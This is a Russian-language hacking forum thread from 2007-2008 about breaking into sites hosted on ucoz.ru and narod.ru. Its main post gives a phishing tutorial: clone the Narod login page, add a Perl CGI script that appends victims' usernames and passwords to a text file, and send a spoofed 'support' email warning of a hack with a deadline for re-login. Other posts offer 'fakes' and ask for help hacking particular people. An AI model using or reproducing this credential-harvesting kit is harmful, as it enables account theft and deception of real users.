Способы взлома сайтов на ucoz.ru

Лосо Фиджи · 19.09.2007, 00:25

Извините если не там пишу, не могли бы вы рассказать какие есть способы взломов сайтов на ucoz.ru и по подробнее если можно , заранее благодарен.

~~*rosgot*~~ · 20.09.2007, 03:37

Вот маленькая статейка которую написал Swiz:
Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем на хостинге narod.ru(хотя его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать). Начнём. Для проведения нижеописанных действий вам понадобятся:
1. Мозги
2. Руки
3. Хостинг с поддержкой CGI
4. Небольшое знание HTML
Итак ищем жертву. У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа. Подправляем его, как надо, вставляем туда форму для подтверждения логина и пароля. И получается примерно следующее:

Ещё надо написать write.cgi:

Цитата:

&GetFormInput;

$name=$field{'name'};
$pass=$field{'pass'};

sub GetFormInput {

(*fval) = @_ if @_ ;
local ($buf);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
}
else {
$buf=$ENV{'QUERY_STRING'};
}
if ($buf eq "") {
return 0 ;
}
else {
@fval=split(/&/,$buf);
foreach $i (0 .. $#fval){
($name,$val)=split (/=/,$fval[$i],2);
$val=~tr/+/ /;
$val=~ s/%(..)/pack("c",hex($1))/ge;
$name=~tr/+/ /;
$name=~ s/%(..)/pack("c",hex($1))/ge;

if (!defined($field{$name})) {
$field{$name}=$val;
}
else {
$field{$name} .= ",$val";
}
}
}
return 1;
}
open (OUTFILE, ">>pass.txt");
print OUTFILE "$name";
print OUTFILE " $pass";
print OUTFILE " =======END======= ";
close (OUTFILE);
print "Location: http://your_redirect_URL " ;

Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё осталось только назначить кнопке 'Подтвердить' выполнение скрипта, закачать на хостинг и отослать письмо жертве с анонимного мыла от support@narod.yandex.ru вида: "Здравствуйте, ваш сайт пытались взломать и вам срочно не позже чем через 96 часов
надо пройти повторную авторизацию. Идите по ссылке (вот тут жертва и отдаст нам пароль)' А для того, чтобы не было понятно, что ссылка не народовская, пользуй nslookup и тогда ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html. Удачи!!!

n0153r · 03.10.2007, 21:46

Знаю способ убрать рекламу с Уроза :

Код:

<script> 
var div = document.getElementsByTagName('div')[0]; 
div.innerHTML = ''; 
</script>

~~*ST[7X]*~~ · 05.10.2007, 15:14

Вот набор фейков может кому пригодится....

~~*grishka*~~ · 04.01.2008, 18:20

ещё, вы не могли бы объяснить как скрыть ссылки от гостей, по всей админке шарил, ненашёл

| · 31.01.2008, 18:05

Поменяйте в коде страницы. Сделайте сссылку скрытой. Isis писал как делать это в различных брузерах =)

S@shk@ · 28.04.2008, 12:09

Цитата:

Итак ищем жертву. У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа. Подправляем его, как надо, вставляем туда форму для подтверждения логина и пароля. И получается примерно следующее:

Я полный ламер,во взломе сайтов но плз очень надо взломать то что я привел в цитате можно по подробнее расписать и где написать write.cg этот файл

Заранее спасибо

vip1980 · 04.11.2008, 22:14

И мне пожалуйста можно токо не в лс а тута, тогда чтобы все видели

Time Lord · 08.11.2008, 20:03

Я ни фурычу никак! Можете все по полочкам, и прямо здесь, а не в ЛС, а то сколько еще таких здесь!!!!! Взломать кое-кого надо, оч сильно!!

Maksim19 · 12.11.2008, 16:19

Помогите со взломом...